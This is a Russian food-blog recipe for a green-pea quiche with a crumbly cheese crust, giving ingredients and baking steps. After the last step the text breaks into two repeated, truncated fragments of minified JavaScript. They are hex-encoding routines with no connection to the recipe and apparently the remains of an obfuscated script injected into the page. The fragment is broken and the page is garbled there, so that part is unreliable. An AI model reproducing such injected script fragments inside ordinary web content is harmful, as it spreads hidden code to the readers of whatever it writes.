Киш с зеленым горошком

Лично я просто обожаю зеленый горошек во всех его проявлениях. С появлением собственного огорода удалось поготовить и попробовать и сахарные стручки и вкусные нежные проростки. Но основное конечно это собственно горошины. Причем консервированный горошек  я как-то с детства не любила, а вот замороженный или свежий готова есть хоть каждый день. В ожидании своего урожая готовлю  с замороженным, и не перестаю экспериментировать. Вот например закусочный киш. Он просто шикарен, как сам по себе, так и в качестве дополнения к куриному бульону. А еще мне кажется, что такой киш можно подать к легкому белому вину. К минеральному такому, хорошо будет. В этом пироге  прекрасно все, и рассыпчатое рубленное тесто, без яйца, зато с сыром, и кремовая начинка весеннего цвета молодой зелени, попробуйте его обязательно !

И без встроенной духовки Gorenje BO 53 CLI я б не справилась!

Еще горошковое:

Творожный тарт с горошком

Теплый салат с горошком

Жареный рис с грибами и стручками горошка

Ингредиенты:

1.Горошек зеленый 300 грамм

2.Мука 125 грамм

3.Яйца 3 шт.

4.Масло сливочное 80 грамм

5.Сыр твердый 90 грамм

6.Сметана 200 грамм

7.Молоко 120 мл.

8.Зеленый лук небольшой пучок

9.Соль

10.Перец черный

Готовим!

  • Для теста просеять муку. Добавить щепотку соли и высыпать смесь в блендер. 65 грамм холодного сливочного масла порезать кубиками и положить к муке. Натереть сыр на мелкой терке и добавить треть к муке. Переработать все в крошку. Добавить 2-3 ст.л. холодной воды, чтоб тесто собралось в шар. Раскатать тесто на посыпанной мукой поверхности и положить в форму для выпечки диаметром не менее 25-26 см.Наколоть тесто вилкой и убрать на 30 минут в холодильник.
  • Накрыть тесто пергаментом, и насыпать сухие бобовые, чтоб тесто при выпекании не деформировалось. Поставить форму с тестом на 20 минут в духовку, нагретую до 170 градусов. Вынуть корж, удалить бумагу и бобовые.
  • Для начинки растопить в сотейнике 15 грамм сливочного масла. Положить в него горошек и рубленный зеленый лук. Тушить, помешивая 5 минут. Измельчить массу в пюре блендером. Яйца взбить миксером со сметаной, молоком и оставшимся сыром(2 ст.л. сыра отложить). Добавить гороховое пюре, соль, перец и еще раз взбить до однородности. Вылить начинку на корж и посыпать сыром. Выпекать киш 20 минут. Подавать теплым.
  • // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o

    Читайте также:

    Добавить комментарий

    Ваш e-mail не будет опубликован. Обязательные поля помечены *